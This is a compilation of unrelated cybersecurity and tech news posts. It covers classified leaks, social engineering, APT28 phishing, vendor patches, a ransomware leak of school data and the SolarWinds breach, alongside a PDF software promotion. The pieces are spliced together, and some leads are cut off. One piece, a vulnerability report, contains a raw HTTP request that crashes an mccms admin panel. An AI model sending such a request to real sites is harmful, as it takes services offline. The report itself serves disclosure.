By Owais Sultan
AI technology, particularly ChatGPT, has rapidly gained traction in various industries due to its ability to provide efficient…
This is a post from HackRead.com Read the original post: Enhancing Productivity with ChatGPT-Powered Wondershare PDFelement

AI technology, particularly **ChatGPT**, has rapidly gained traction in various industries due to its ability to provide efficient and personalized solutions. With advancements in natural language processing and machine learning, ChatGPT has become a powerful productivity tool that businesses are leveraging to streamline operations and meet customer demand in the market. 

From editing tools to data analysis, ChatGPT is transforming how companies interact with users and oversee their operations. As a result, customer satisfaction is much better, user engagement is higher, and therefore, outcomes are even better.

As businesses strive to stay ahead of the competition, the adoption of ChatGPT as a productivity tool has become essential to automate routine tasks, analyze data, and generate content, enabling businesses to focus on higher-level strategic initiatives. 

****Meet ChatGPT Powered Wondershare PDFelement****

Wondershare PDFelement is a ChatGPT-powered comprehensive PDF editing and management software that offers a wide range of features to create, edit, convert, and manage PDF documents. With its user-friendly interface and powerful tools, PDFelement provides businesses and individuals with a convenient and efficient solution for working with PDF files. 

Whether it’s editing text and images, converting PDFs to different file formats, or securing sensitive information with encryption, PDFelement offers a versatile and robust platform for managing all aspects of PDF documents. 

PDFelement’s intuitive design and exceptional functionality have made it a popular choice for professionals, companies, and individuals looking for a dependable and affordable PDF editing alternative.

****AI Features in Wondershare PDFelement****

Wondershare PDFelement is powered by OpenAI’s ChatGPT, an advanced AI technology that enhances the functionality of this PDF editing and management software. ChatGPT enables PDFelement to offer an array of powerful features that streamline document workflows and improve productivity. 

However, with ChatGPT, PDFelement goes beyond traditional PDF editing capabilities and introduces four core features: Summarize PDF, Explain PDF, Proofread PDF, and Rewrite PDF, along with Chat with PDF.

****Summarize PDF****

Summarize PDF allows users to quickly generate a summary of lengthy PDF documents, extracting the most relevant information and condensing it into a concise format. This feature is particularly helpful for users who need to review lengthy reports or research papers and want to save time by obtaining a summarized version of the document.

****Explain PDF** **

Explain PDF helps users understand complex PDF documents by providing explanations for technical terms or jargon within the document. This feature is beneficial for users who may not be familiar with specific terminology or concepts, making PDF documents more accessible and understandable.

****Proofread PDF****

Proofread PDF assists users in identifying and correcting grammatical and spelling errors in PDF documents. With this feature, PDFelement acts as a virtual proofreader, helping users ensure that their documents are error-free and professional-looking.

****Rewrite PDF****

Rewrite PDF is a powerful feature that leverages ChatGPT to automatically rewrite content within a PDF document while preserving the original document’s structure and format. This feature is valuable for users who need to paraphrase or rephrase the content, making it more suitable for their specific needs.

****Chat with PDF****

Chat with PDF allows users to interact with ChatGPT within PDFelement, providing a convenient and intuitive way to ask questions, seek clarifications, or get assistance with PDF-related tasks. This feature enhances the overall user experience by providing a seamless and interactive workflow within the PDFelement software.

Altogether, the integration of ChatGPT into Wondershare PDFelement brings innovative and advanced capabilities that empower users to efficiently manage and edit PDF documents with enhanced productivity and convenience.

****AI Content Detector****

The AI Content Detector feature in Wondershare PDFelement is an important tool for anyone who deals with confidential or sensitive information in PDF documents. With this feature, users can quickly and accurately identify potential privacy concerns, such as credit card numbers, social security numbers, and other confidential data. This helps to ensure that the document is safe to share with others or to store securely, without the risk of accidentally exposing sensitive information. The AI Content Detector feature can also be customized to meet specific privacy needs, allowing users to tailor the level of privacy detection to their unique requirements, and giving them peace of mind when working with confidential information.

In summary, the AI Content Detector feature is a powerful tool in Wondershare PDFelement that uses advanced machine learning algorithms to help users identify and highlight sensitive information in PDF documents. Whether you are working with personal financial data, confidential business information, or any other type of sensitive content, the AI Content Detector can help ensure that your documents are safe and secure and that your privacy is protected at all times.

****Wondershare PDFelement’s Functions****

Wondershare PDFelement can significantly improve productivity for work/study by providing various features that streamline PDF-related tasks. Here are some examples:

****Edit and modify PDFs:** **

PDFelement allows you to edit and modify PDFs with ease. You can add, delete, or modify the text, images, and other elements in a PDF file. This can be helpful for updating documents, filling out forms, or making corrections to study materials without having to recreate the entire document from scratch.

****Convert and create PDFs:** **

PDFelement enables you to convert documents from other formats, such as Word, Excel, and PowerPoint, into PDFs with just a few clicks. You can also create new PDF documents from scratch, which can be useful for creating study guides, reports, or other documents for work or study purposes.

****Annotate and collaborate:****

PDFelement allows you to annotate PDFs with comments, highlights, stamps, and other tools. This can be helpful for adding study notes, reviewing documents, or collaborating with colleagues or classmates. You can also use the comment and markup tools to leave feedback on documents, making it easier to work together on group projects or receive feedback on your work.

****OCR (Optical Character Recognition):** **

PDFelement has built-in OCR technology that can convert scanned documents into searchable and editable text. This can be beneficial for digitizing printed materials, such as textbooks or research papers, and making them easily searchable and editable, saving you time and effort in manual data entry.

****Form creation and form data extraction:** **

PDFelement allows you to create interactive forms with checkboxes, radio buttons, text fields, and other form elements. This can be helpful for creating surveys, questionnaires, or feedback forms for work or study purposes. You can also extract form data from PDFs, saving you time and effort in manually collecting and inputting data.

****Document security:** **

PDFelement provides security features such as password protection, redaction, and digital signatures, which can help protect sensitive documents and ensure their integrity. This can be essential for handling confidential work documents or submitting signed assignments for study purposes.

****Batch processing:** **

PDFelement allows you to process multiple PDFs at once, such as batch converting, batch extracting data from forms, or batch applying watermarks. This can save you time and effort when dealing with large numbers of PDF files, making it more efficient for work or study tasks.

Overall, PDFelement’s features improve productivity for work/study by providing robust tools for editing, converting, annotating, collaborating, securing, and automating PDF-related tasks. It simplifies and streamlines PDF workflows, allowing you to work more efficiently and effectively with PDF documents, ultimately boosting productivity in your work or study environment.

****Download Wondershare PDFelement****

If you are ready to unlock the power of cutting-edge artificial intelligence in your PDF editing experience, look no further than Wondershare PDFelement.

With ChatGPT-powered AI features, you can experience a whole new level of productivity and efficiency starting from effortlessly editing, annotating, and collaborating on your PDFs with just a few simple commands. Need to highlight important information, add comments, or extract data from your PDFs? AI features have you covered.

Nevertheless, you can unlock the power of ChatGPT PDF in PDFelement and experience smooth and consistent PDF editing. Experience the power of ChatGPT’s AI features and elevate your PDF editing game to new heights.

Enhancing Productivity with ChatGPT-Powered Wondershare PDFelement

AI tools? A porn filter, but for Top Secret documents? Just classifying less stuff? US lawmakers are full of ideas but lack a silver bullet.

In the wake of the most recent classified leak case—this time allegedly involving a 21-year-old Air National Guard IT specialist, not a president—lawmakers on Capitol Hill are redoubling efforts to classify less information. But as lawmakers await more details on how cyber transport systems specialist Jack Teixeira was allegedly able to disseminate highly sensitive military documents on the chat app Discord, the growing consensus among lawmakers is that America’s classification protocols need to be overhauled.  

“It seems to me like we're trying to protect so much that the job becomes impossible, and then inevitably, things that really, really matter slip through the cracks,” US representative Adam Smith, the top Democrat on the House Armed Services Committee, told reporters upon leaving a classified briefing on the leak late last month. “That's the lesson for me, is if you try to do absolutely everything, then you can't do the things that you really want to do.”

Over-classification is one bookend, as Senate Intelligence chair Mark Warner puts it, which was on display as classified documents were found in the possession of President Joe Biden, former president Donald Trump, and former vice president Mike Pence. But this latest case reveals problems on the other end of the spectrum: Too many people have security clearances.

“Now we, in a sense, have potentially the worst of both worlds, where we have an over-classification problem and, at the same time, in the public domain it’s been reported that we have more than 4 million people with clearances,” Warner says. “So how do you square those?”

Lawmakers in both parties are now looking to technology for help as they negotiate how to best protect American secrets, while—if proponents get their way—also increasing transparency.

“This Is a Serious Situation”

The FBI arrested Teixeira on April 13 after a series of US military documents, some labeled “Top Secret,” surfaced online. Teixeira allegedly shared the documents with members of a Discord server as early as last December. Members of the Discord group reportedly claim that hundreds of documents, many of which pertain to Russia’s war against Ukraine, were shared with the group.

On Wednesday, two of Teixeira’s commanders were suspended, “pending further investigation into the unauthorized disclosure of classified information,” according to the US Air Force. In its 42-page filing, released ahead of Teixeira facing Magistrate Judge David Hennessy of the US District Court in Massachusetts on Thursday, the Department of Justice accuses the IT specialist of trying to destroy evidence and looking up mass shootings on his federal government computer. The Justice Department also claims Teixeira’s former access to classified information “far exceeds what has been publicly disclosed.” 

On Thursday, DOJ lawyers also said Teixeira owns a large number of firearms and that they found social media posts where he says he wants to kill a “ton of people.” Defense lawyers argued that Teixeira never meant for the classified material to be widely—let alone internationally—disseminated. The magistrate was skeptical. 

Meanwhile, at the Capitol, when they’re not fuming, lawmakers are befuddled.

“This is a serious situation. You just can’t let someone like this have access to this kind of classified information, and, if you do, you ought to at least use technology to block that person from being able to share it,” says Senator John Kennedy, a Louisiana Republican. “I mean, most of us can put controls on the internet to stop our kids from looking at pornography, for God’s sake. How hard is that?”

Pentagon officials are promising members of Congress another briefing in early June. In the meantime, lawmakers fear current protocols amount to a high-stakes game of whack-a-mole—a game the intelligence community continues to lose despite a series of high-profile leaks that led to changes in the protocols governing classified material.

In 2010, Army Private First-Class Chelsea Manning was arrested for sharing US intelligence with WikiLeaks. Then in 2013, NSA contractor Edward Snowden shared thousands of classified documents with reporters from _The Guardian_ and _The Washington Post_. Lawmakers say they don’t think those leaks could happen today, but they’re still pressing the Pentagon for answers.

“I believe—and I believe this, I don’t have complete proof—that some of the places that in the past where mistakes were made, may have had stricter protocols than the whole balance of the \[Department of Defense\],” Warner says.

Starting in 2018, the federal government replaced its old clearance protocol—where clearances were updated every five to 10 years—with a continuous vetting system for employees and contractors with security clearances that’s supposed to be fully implemented by October 1, 2023.

“One of the things that we have moved into in this internet-driven age is a process called continuous vetting, so even once you get a top-secret security clearance, you’re supposed to be vetted on an ongoing basis,” Warner says. “That raises a whole host of questions about posting in public or otherwise on the internet that, frankly, still need to be sorted out.” While the Discord leaks investigation continues, Warner says a top priority for lawmakers is making sure “continuous vetting in an internet-driven age actually can spot anomalies.”  

Too Many Secrets

Whether an updated system will involve artificial intelligence tools remains unknown, but some senators are pushing the intelligence community to embrace new technologies to help streamline and safeguard government secrets.

“They're going to need to come up with things like artificial intelligence and other things to be able to identify sensitive digital content so we can keep the truly important stuff secret but then make everything else available to the public,” says Senator John Cornyn, a Texas Republican.

Since classified documents from past administrations were found at Trump’s Mar-a-Lago in Florida, a Biden office and home in Delaware, and Pence’s Indiana home, lawmakers have been focusing on overclassification. Cornyn says he’s been a part of talks with Republican senator Jerry Moran of Kansas, Democratic senator Ron Wyden of Oregon, and Warner on how to streamline classification protocols. 

“I think there's just a lot of work that needs to be done and can be done, to provide more political accountability and, at the same time, raise standards for protecting truly sensitive national security information,” Cornyn says. “We need to have a better process for declassified information for historical purposes and lessons learned, so we're going to hopefully roll out a bill here pretty soon.”

Lawmakers remain perplexed over how all these classified documents keep getting out, in part because, at the Capitol, sensitive documents are kept under lock, armed guard, and key. Beyond that, many fear the culture around classified documents is too lax throughout the executive branch.

From 2009 to 2013, Don Beyer served as ambassador to Switzerland and Liechtenstein, where he took extraordinary measures to protect classified documents. “I made a rule that, mostly, I would actually go to our base office and have them talk to me about it. Or if they came to my office with it, you stand right there while I read it. I never want it on my desk,” Beyer says of classified material. “There's never a phone in that office. Every phone was left outside. In every office in our building, you had to leave your cell phone outside.”  

Now that he’s a Democratic representative from Virginia, Beyer is also wondering what role overclassification is playing in all these high-stakes blunders. “When you classify so much stuff, more people have the clearances in order to be able to do their job,” Beyer says. “So if you could rationalize it, maybe you can shrink the number of people who need a clearance.” 

The ‘Need-to-Share’ Era

Even as US officials and lawmakers are focused on keeping American secrets, well, secret, others are warning against overreacting. Information flies these days.

“It's a problem. We’ve got to figure out a better system, obviously, going forward. But you’ve got to balance that against the need for people to have access to information as well,” says Representative Mike Gallagher, the Wisconsin Republican who chairs the new House select committee on China. “I think it's just an increasing trend in the 21st century, which is, we're going to have to move from this kind of need-to-know culture to a need-to-share in the government and with our allies.”

Disinformation, as this most recent leak of classified documents showcases, flies too. Versions of the sensitive files Teixeira allegedly shared with his buddies on Discord were later posted on pro-Russian Telegram channels, but they’d been crudely altered to make Russia look better and Ukraine look worse.

“Some of them have been doctored. Some adjusted, I’m sure, by the defendant himself, so assessing what the potential damage is and how to prevent that from occurring will be an ongoing process,” says Senator Mitt Romney, a Utah Republican.

Technological fixes can only go so far. Plus, for the time being, there’s always a human at the other end—and there’s no AI fix for human nature, at least not yet.

“I think the fundamental dilemma remains, which is that, ultimately, when you give someone a top-secret clearance, you’re placing an enormous amount of trust in that person. It’s hard to design software—or a policy—to fix the problem of human beings doing bad things," Gallagher says. “So there's some level of risk just built into the system that I think it's impossible to be reduced to zero. It’s not obvious to me right yet what the right fix is. We're trying to figure that out.”

The High-Stakes Scramble to Stop Classified Leaks

Categories: Personal
Tags: Small Business Week 2023

Tags:  Small Business Week

Tags:  phishing

Tags:  pretexting

Tags:  baiting

Tags:  tailgating

Tags:  BEC

Tags:  CEO fraud

Tags:  business email compromise

Tags:  O'Neill Bragg & Staffin

Tags:  2022 Internet Crime Report

Tags:  FBI

Tags:  most reported fraud

Tags:  most damaging fraud

Small businesses are frequent targets of social engineering. Here's what it is and how to protect against it.



(Read more...)




The post How to protect your small business from social engineering appeared first on Malwarebytes Labs.

When Alvin Staffin received an email from his boss, he didn't question it. In the email, Gary Bragg, then-president of Pennsylvania law firm O'Neill, Bragg & Staffin, asked Staffin to wire $580,000 to a Bank of China account. Staffin, who was VP and in charge of banking, sent the money through as asked. An hour later, he realized the request was fraudulent—he hadn't been contacted by Bragg at all.

A hacker had gained access to Bragg's email account and used it, along with information they'd learned about an ongoing loan transaction, to pose as Staffin's boss. Nothing in the exchange made Staffin suspect that something was off until he called Bragg, who was out of town at the time, to discuss the transfer.

Both Staffin and his employer were victims of business email compromise (BEC), also known as CEO fraud, a type of social engineering attack. Social engineering attacks are cyberattacks where a criminal tricks a victim into doing something against their interests, such as revealing sensitive information of making a bank transfer.

BEC is one of the most damaging forms of social engineering attacks faced by small businesses. In the 2022 Internet Crime Report, the FBI ranked it as the second most damaging fraud, in terms of financial losses, after investment fraud.

The common forms of social engineering used by criminals are pretexting, phishing, baiting, and tailgating. Pretexting involves creating a false identity and situation to trick victims into providing information or access (BEC is a form of pretexting). Phishing attacks try to trick victims into giving away sensitive information, such as login credentials, using emails and websites designed to look like they belong to a person or business the victim trusts, such as their bank. Baiting is when malware-infected devices, such as USB sticks, are left in public places, in the hope that victims will take them and use them. Lastly, tailgating is when a fraudster follows an authorized person into a restricted area without proper authorization.

**Protecting your business from social engineering**

Securing a small business from social engineering attacks is an ongoing effort that requires constant vigilance. Because social engineering relies on a criminal's powers of persuasion, your staff's vigilance is your first line of defence. Security software forms a vital second line, protecting your business from some social engineers' tools, such as phishing sites, and from social engineering attacks designed to deliver malware.

Your first priority should be to empower employees to be confident in identifying and effectively responding to social engineering tactics.

*   **Run regular training** to help employees understand how to properly recognize and respond to social engineering. Consider testing your staff, too, and follow up with further education for anyone who fails the test.
*   **Use at least two people for financial transactions.** Social engineering attacks try to isolate and hurry staff so they act without thinking. Create checks in your processes to prevent that.
*   **Create an intentional culture of security** so that security practices come naturally to your staff. Encourage people to report suspicious activity sooner rather than later, avoid punishing staff who fall for social engineering so that others are not afraid to be accountable, and lead by example.
*   **Use endpoint security** to protect against the effects of baiting attacks, to block phishing sites, and to detect malware delivered by social engineering.
*   **Monitor threat intelligence** to understand current and emerging threats that could affect your business.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

How to protect your small business from social engineering

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country.
The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.
The email messages come with the subject line "

Threat Analysis / Cyber Attack

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country.

The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.

The email messages come with the subject line "Windows Update" and purportedly contain instructions in the Ukrainian language to run a PowerShell command under the pretext of security updates.

Running the script loads and executes a next-stage PowerShell script that's designed to collect basic system information through commands like tasklist and systeminfo, and exfiltrate the details via an HTTP request to a Mocky API.

To trick the targets into running the command, the emails impersonated system administrators of the targeted government entities using fake Microsoft Outlook email accounts created with the employees' real names and initials.

CERT-UA is recommending that organizations restrict users' ability to run PowerShell scripts and monitor network connections to the Mocky API.

The disclosure comes weeks after the APT28 was tied to attacks exploiting now-patched security flaws in networking equipment to conduct reconnaissance and deploy malware against select targets.

Google's Threat Analysis Group (TAG), in an advisory published last month, detailed a credential harvesting operation carried out by the threat actor to redirect visitors of Ukrainian government websites to phishing domains.

Russian-based hacking crews have also been linked to the exploitation of a critical privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) in intrusions directed against the government, transportation, energy, and military sectors in Europe.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The development also comes as Fortinet FortiGuard Labs uncovered a multi-stage phishing attack that leverages a macro-laced Word document supposedly from Ukraine's Energoatom as a lure to deliver the open source Havoc post-exploitation framework.

"It remains highly likely that Russian intelligence, military, and law enforcement services have a longstanding, tacit understanding with cybercriminal threat actors," cybersecurity firm Recorded Future said in a report earlier this year.

"In some cases, it is almost certain that these agencies maintain an established and systematic relationship with cybercriminal threat actors, either by indirect collaboration or via recruitment."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

APT28 Targets Ukrainian Government Entities with Fake "Windows Update" Emails

Firefox gets a needed tune-up, SolarWinds squashes two high-severity bugs, Oracle patches 433 vulnerabilities, and more updates you should make now.

Given the number and seriousness of the issues, Chrome users should prioritize checking that their current version is up to date.

Mozilla Firefox

Chrome rival Firefox has fixed issues in Firefox 112, Firefox for Android 112, and Focus for Android 112. Among the flaws is CVE-2023-29531, an out-of-bound memory access in WebGL on macOS rated as having a high impact. Meanwhile, CVE-2023-29532 is a bypass flaw affecting Windows, which requires local system access.

CVE-2023-1999 is a double-free in libwebp that could result in memory corruption and a potentially exploitable crash, Firefox owner Mozilla wrote in an advisory.

Mozilla also fixed two memory safety bugs, CVE-2023-29550 and CVE-2023-29551. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort, some of these could have been exploited to run arbitrary code,” the browser maker said.

SolarWinds

IT giant SolarWinds has patched two high-severity issues in its platform that could lead to command execution and privilege escalation. Tracked as CVE-2022-36963, the first issue is a command-injection flaw in SolarWinds’ infrastructure monitoring and management product, the firm wrote in a security advisory. If exploited, the bug could allow a remote adversary with a valid SolarWinds Platform admin account to execute arbitrary commands.

Another high-severity issue is CVE-2022-47505, a local privilege escalation vulnerability that a local adversary with a valid system user account could use to escalate privileges.

The latest SolarWinds patch fixes several more issues rated as having a medium impact. None have been used in attacks, but if you are impacted by the flaws, it makes sense to update as soon as possible.

Oracle

April has been a big month for enterprise software maker Oracle, which has issued fixes for 433 vulnerabilities, 70 of which are rated as having a critical severity. These include issues in the Oracle GoldenGate Risk Matrix, including CVE-2022-23457, which has a CVSS base score of 9.8. The issue may be remotely exploitable without authentication, Oracle said in its advisory.

The April fixes also contain six new patches for Oracle Commerce. “All of these vulnerabilities may be remotely exploitable without authentication,” Oracle warned.

Due to the threat posed by a successful attack, Oracle “strongly recommends” that customers apply Critical Patch Update security fixes as soon as possible.

Cisco

Software firm Cisco has released fixes for vulnerabilities that could allow an authenticated, local attacker to escape the restricted shell and gain root privileges on the underlying operating system.

CVE-2023-20121, which affects Cisco EPNM, Cisco ISE, and Cisco Prime Infrastructure, is a  command-injection vulnerability. An attacker could exploit the flaw by logging in to the device and issuing a crafted CLI command. “A successful exploit could allow the attacker to escape the restricted shell and gain root privileges on the underlying operating system of the affected device,” Cisco said, adding that the attacker must be an authenticated shell user to exploit the flaw.

Meanwhile, CVE-2023-20122 is a command-injection vulnerability in the restricted shell of Cisco ISE that could allow an authenticated, local attacker to escape the restricted shell and gain root privileges on the underlying operating system.

SAP

It’s been another busy Patch Day for SAP, which saw the release of 19 new Security Notes. Among the fixes are CVE-2023-27497, comprising multiple vulnerabilities in SAP Diagnostics Agent. Another notable patch is CVE-2023-28765, an information disclosure vulnerability in SAP BusinessObjects Business Intelligence Platform. A missing password protection enforcement allows an attacker to access the lcmbiar file, according to security firm Onapsis. “After successful decryption of its content, the attacker could gain access to a user’s passwords,” the firm explained. “Depending on the authorizations of the impersonated user, an attacker could completely compromise the system’s confidentiality, integrity, and availability.”

Apple, Google, and Microsoft Just Fixed Zero-Day Security Flaws

Plus: Cyber Command’s disruption of Iranian election hacking, an exposé on child sex trafficking on Meta’s platforms, and more.

Ransomware gangs have long sought pain points where their extortion demands have the greatest leverage. Now an investigation from NBC News has made clear what that merciless business model looks like when it targets kids: One ransomware group's giant leak of sensitive files from the Minneapolis school system exposes thousands of children at their most vulnerable, complete with behavioral and psychological reports on individual students and highly sensitive documentation of cases where they've allegedly been abused by teachers and staff.

We'll get to that. But first, WIRED contributor Kim Zetter broke the news this week that the Russian hackers who carried out the notorious SolarWinds espionage operation were detected in the US Department of Justice's network six months earlier than previously reported—but the DOJ didn't realize the full scale of the hacking campaign that would later be revealed. 

Meanwhile, WIRED reporter Lily Hay Newman was at the RSA cybersecurity conference in San Francisco, where she brought us stories of how security researchers disrupted the operators of the Gootloader malware who sold access to victims' networks to ransomware groups and other cybercriminals, and how Google Cloud partnered with Intel to hunt for and fix serious security vulnerabilities that underlie critical cloud servers. She also captured a warning in a talk from NSA cybersecurity director Rob Joyce, who told the cybersecurity industry to "buckle up" and prepare for big changes to come from AI tools like ChatGPT, which will no doubt be wielded by both attackers and defenders alike.

On that same looming AI issue, we looked at how the deepfakes enabled by tools like ChatGPT, Midjourney, DALL-E, and StableDiffusion will have far-reaching political consequences. We examined a newly introduced US bill that would ban kids under the age of 13 from joining social media. We tried out the new feature in Google's Authenticator App that allows you to back up your two-factor codes to a Google account in case you lose your 2FA device. And we opined—well, ranted—on the ever-growing sprawl of silly names that the cybersecurity industry gives to hacker groups.

But that’s not all. Each week, we round up the news we didn’t report in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

What happens when a school system is targeted by a ransomware group, refuses to pay, and thus gets their stolen data dumped wholesale onto the dark web? Well, it's even worse than it sounds, as NBC's Kevin Collier found this week when he dug through portions of a trove of 200,000 files leaked online after the Minneapolis public school system was hit by hackers earlier this year. 

The leaked files include detailed dossiers linking children by name, birth date, and address to a laundry list of highly private information: their special needs, their psychological profiles and behavioral analyses, their medications, the results of intelligence tests, and which kids' parents have divorced, among many other sensitive secrets. In some cases, the files even note which children have been victims of alleged abuse by school teachers or staff. The hackers also took special pains to publicly promote their toxic dump of children's information, with links posted to social media sites and a video showing off the files and instructing viewers how to download them.

The Minneapolis school system is offering free credit monitoring to parents and children affected by the data dump. But given the radioactive nature of the personal information released by the hackers, identity fraud may be the least of their victims' worries.

In a rare declassified disclosure at a panel at this week's RSA Conference, General William Hartman revealed that US Cyber Command had disrupted an Iranian hacking operation that targeted a local elections website ahead of the 2020 election. According to Hartman, who leads Cyber Command's National Mission Force, the intrusion couldn't have affected actual vote counts or voting machines, but—had Cyber Command's own hackers not kiboshed the operation—might have potentially been used to post false results as part of a disinformation effort. 

Hartman named the Iranian hackers as a group known as Pioneer Kitten, also sometimes referred to as UNC757 or Parisite, but didn't name the specific elections website that they targeted. Hartman added that the hacking operation was found thanks to Cyber Command's Hunt Forward operations, in which it hacks foreign networks to preemptively discover and disrupt adversaries who target the US.

Following a two-year investigation, _The Guardian_ this week published a harrowing exposé on Facebook and Instagram's use as hunting grounds for child predators, many of whom traffic in children as sexual abuse victims for money on the two social media services. Despite the claims of the services' parent company Meta that it's closely monitoring its services for child sexual abuse materials or sexual trafficking, _The_ _Guardian_ found horrific cases of children whose accounts were hijacked by traffickers and used to advertise them for sexual victimization. 

One prosecutor who spoke to _The Guardian_ said that he'd seen child trafficking crimes on social media sites increase by about 30 percent each year from 2019 to 2022. Many of the victims were as young as 11 or 12 years old, and most were Black, Latinx, or LGBTQ+.

A group of hackers has been taking over AT&T email accounts—the telecom provider runs email domains including att.net, sbcglobal.net, bellsouth.net—to hack their cryptocurrency wallets, TechCrunch reports. 

A tipster tells TechCrunch that the hackers have access to a part of AT&T's internal network that allows them to generate "mail keys" that are used to offer access to an email inbox via email applications like Thunderbird or Outlook. The hackers then use that access to reset the victims' passwords on cryptocurrency wallet services like Gemini and Coinbase, and, according to TechCrunch's source, have already amassed between $10 million and $15 million in stolen crypto, though TechCrunch couldn't verify those numbers.

The Tragic Fallout From a School District’s Ransomware Breach

An issue discovered in mccms 2.6.1 allows remote attackers to cause a denial of service via Backend management interface ->System Configuration->Cache Configuration->Cache security characters.

Hello, we found that your project has a denial of service vulnerability. Details are as follows.

1.  Vulnerability Function Point  
    The function point exists in Backend management interface ->System Configuration->Cache Configuration->Cache security characters  
    
2.  Vulnerability details  
    Httpraw packet
    

    POST /admin.php/setting/cache_save HTTP/1.1
    Host: 172.20.10.3:81
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 297
    Origin: http://172.20.10.3:81
    Connection: close
    Referer: http://172.20.10.3:81/admin.php/setting/cache
    Cookie: mc_admin_id=972crMx4oruLsvSMuCQXg89E59IOc1gCMu4UbgT2; mc_admin_nichen=60e3ZaYNY8XyAN56ivxQjLyJIwtpFNMFPD2rXUJoIUJazlazXN4; mc_admin_login=89f0uw62E0x-cUBqH1lgtD4EbEsdytBZGLWhBDRRiwv2iT0vaJpingm4ylkt8PD4ndhPfLzwoCgMerpjnw
    
    Cache_Mode=0&Cache_Rand=ygmjqw7jpia4aughbhj%5C&Cache_Mem_Ip=127.0.0.1a%2F%2F%2F%E9%8E%88'%22%5C(&Cache_Mem_Port=11211&Cache_Mem_Pass=()&Cache_Redis_Ip=127.0.0.1&Cache_Redis_Port=6379&Cache_Redis_Pass=()&Cache_Time_Index=1800&Cache_Time_List=3600&Cache_Time_Show=1&Cache_Time_Pic=3600&Cache_Time=72
    

When I add the “\\” character after the Cache\_Rand parameter, it can cause the site to not work properly.As you can see in the screenshot below, when you visit the website now, the response status code is already 500 and the website is no longer working properly.  
  

3.  Code audit  
    According to the function route, we can locate the "sys/apps/controllers/admin/Setting.php" file,Based on the function route, we can locate the cache\_save function in the sys/apps/controllers/admin/Setting.php file.The Cache\_Rand parameter passed in by the user is written to the cache.php file.

Then we open the “sys/libs/cache.php” file.You can see that the “\\” symbol is used as an escape character to escape the “'”symbol.

CVE-2023-26782: There is a denial of service vulnerability in your project · Issue #2 · chshcms/mccms

In May 2020, the US Department of Justice noticed Russian hackers in its network but did not realize the significance of what it had found for six months.

The US Department of Justice, Mandiant, and Microsoft stumbled upon the SolarWinds breach six months earlier than previously reported, WIRED has learned, but were unaware of the significance of what they had found.

The breach, publicly announced in December 2020, involved Russian hackers compromising the software maker SolarWinds and inserting a backdoor into software served to about 18,000 of its customers. That tainted software went on to infect at least nine US federal agencies, among them the Department of Justice (DOJ), the Department of Defense, Department of Homeland Security, and the Treasury Department, as well as top tech and security firms including Microsoft, Mandiant, Intel, Cisco, and Palo Alto Networks. The hackers had been in these various networks for between four and nine months before the campaign was exposed by Mandiant. 

WIRED can now confirm that the operation was actually discovered by the DOJ six months earlier, in late May 2020—but the scale and significance of the breach wasn’t immediately apparent. Suspicions were triggered when the department detected unusual traffic emanating from one of its servers that was running a trial version of the Orion software suite made by SolarWinds, according to sources familiar with the incident. The software, used by system administrators to manage and configure networks, was communicating externally with an unfamiliar system on the internet. The DOJ asked the security firm Mandiant to help determine whether the server had been hacked. It also engaged Microsoft, though it’s not clear why the software maker was also brought onto the investigation.

It’s not known what division of the DOJ experienced the breach, but representatives from the Justice Management Division and the US Trustee Program participated in discussions about the incident. The Trustee Program oversees the administration of bankruptcy cases and private trustees. The Management Division advises DOJ managers on budget and personnel management, ethics, procurement, and security.

Investigators suspected the hackers had breached the DOJ server directly, possibly by exploiting a vulnerability in the Orion software. They reached out to SolarWinds to assist with the inquiry, but the company’s engineers were unable to find a vulnerability in their code. In July 2020, with the mystery still unresolved, communication between investigators and SolarWinds stopped. A month later, the DOJ purchased the Orion system, suggesting that the department was satisfied that there was no further threat posed by the Orion suite, the sources say.

A DOJ spokesperson confirmed that the incident and investigation occurred but wouldn’t provide any details about what investigators concluded. “While the incident response and mitigation effort was completed, the FBI’s criminal investigation remained open throughout,” the spokesperson wrote in an email. WIRED confirmed with sources that Mandiant, Microsoft, and SolarWinds were involved in discussions about the incident and investigation. All three companies declined to discuss the matter.

The DOJ told WIRED that it notified the US Cybersecurity and Infrastructure Agency (CISA) about the breach at the time it occurred—though a US National Security Agency spokesperson expressed frustration that the agency was not also notified. But in December 2020, when the public learned that a number of  federal agencies were compromised in the SolarWinds campaign—the DOJ among them—neither the DOJ nor CISA revealed to the public that the operation had unknowingly been found months earlier. The DOJ initially said its chief information officer had discovered the breach on December 24.

In November 2020, months after the DOJ completed the mitigation of its breach, Mandiant discovered that it had been hacked, and traced its breach to the Orion software on one of its servers the following month. An investigation of the software revealed that it contained a backdoor that the hackers had embedded in the Orion software while it was being compiled by SolarWinds in February 2020. The tainted software went out to about 18,000 SolarWinds customers, who downloaded it between March and June, right around the time the DOJ discovered the anomalous traffic exiting its Orion server. The hackers chose only a small subset of these to target for their espionage operation, however. They burrowed further into the infected federal agencies and about 100 other organizations, including technology firms, government agencies, defense contractors, and think tanks.

Mandiant itself got infected with the Orion software on July 28, 2020, the company told WIRED, which would have coincided with the period that the company was helping the DOJ investigate its breach.

